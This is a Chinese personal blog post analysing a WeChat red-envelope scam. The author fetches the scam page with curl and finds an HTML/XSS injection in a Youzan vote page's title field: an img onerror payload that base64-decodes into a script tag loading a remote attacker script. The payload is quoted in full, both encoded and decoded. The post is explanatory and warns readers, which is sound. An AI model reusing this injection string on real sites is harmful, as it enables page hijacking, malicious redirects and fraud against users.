今天在微信里收到一条邀请加群的消息
点击。。。。然后发现上当了,被带到了其他红包诱引分享,强制分享的网页,
要分享3个群,然后又提示分享到朋友圈,等等。。。我靠,强
然后一路点,一路分享,一路点,一路分享,分享了5.6次之后提示红包获取成功啦。提示不要删除朋友圈,红包在排队,24小时内到达微信余额

然后,你要点关闭吧,返回吧,不好意思,这时候广告来了,色情小说、猛药,一直返回一直关闭,无论怎么点都不行,无数条广告在后面等着你的。哎,点X关闭网页吧或者实在不行,你就关掉微信吧

注意哈:我肯定不是真的分享啦,这点我还是懂的,你就假假的点一下分享,然后返回就是了,你要真的分享出去,那你就中了招了,为他带去了无数人了,无数人也被你害惨了。

瞬间感到网友的技术之强大啊,技术出身比较感兴趣,就想看看究竟。

重新打开链接,下拉,发现红包诱惑页面,居然是“有赞”这个平台的域名,哇,兴趣来了。。。看看他是怎么做到的。。

把别个分享出来加群伪装链接收藏一下,然后去收藏夹复制链接。

用CURL工具请求一下,在返回的代码中发现:


<div class="vote-details" action="/v2/apps/vote/vote.json?alias=km0wbw4g&p=1">

    <div class="vote-entry question-1"
    data-type="text"
    data-title=""><img src="x"onerror="document.write(atob(`PHNjcmlwdCBzcmM9aHR0cHM6Ly9hcGkuaW5yZWFsdGVjaC5jb20vaj48L3NjcmlwdD4=`))"><!--"
    data-id="62129994"
     data-skipdata=""
     data-index="1"

    >
    <div class="control_title">
        <h3 class="title">
                        1. "><img src="x"onerror="document.write(atob(`PHNjcmlwdCBzcmM9aHR0cHM6Ly9hcGkuaW5yZWFsdGVjaC5jb20vaj48L3NjcmlwdD4=`))"><!--        </h3>
        <h4 class="sub_title">
                    </h4>

一看就明白了,商品标题被注入了HTML代码,然后和页面的其他代码拼接起来,就可以实现跳转到任何URL了,注入的内容是:

"><img src="x"onerror="document.write(atob(`PHNjcmlwdCBzcmM9aHR0cHM6Ly9hcGkuaW5yZWFsdGVjaC5jb20vaj48L3NjcmlwdD4=`))"><!--

atob() 方法用于解码使用 base-64 编码的字符串。
base-64 编码使用方法是 btoa() 。

PHNjcmlwdCBzcmM9aHR0cHM6Ly9hcGkuaW5yZWFsdGVjaC5jb20vaj48L3NjcmlwdD4=

这段字符串就是base-64 编码后的内容,解码出来就是:

<script src=https://api.inrealtech.com/j></script>

没错,最终页面加载了这个URL的脚本:https://api.inrealtech.com/j
不过,这个地址是经过处理了的,你访问的话是这个结果(只能在手机的微信里访问并且是有赞的相关的页面才能得到正确脚本内容):

<html><title>500: Internal Server Error</title><body>500: Internal Server Error</body></html>

攻击者就是通过这个脚本里加入跳转代码,最终让网页漂走的,至于其他的技术就不想去深入了

文章作者:joyber

标签: none

添加新评论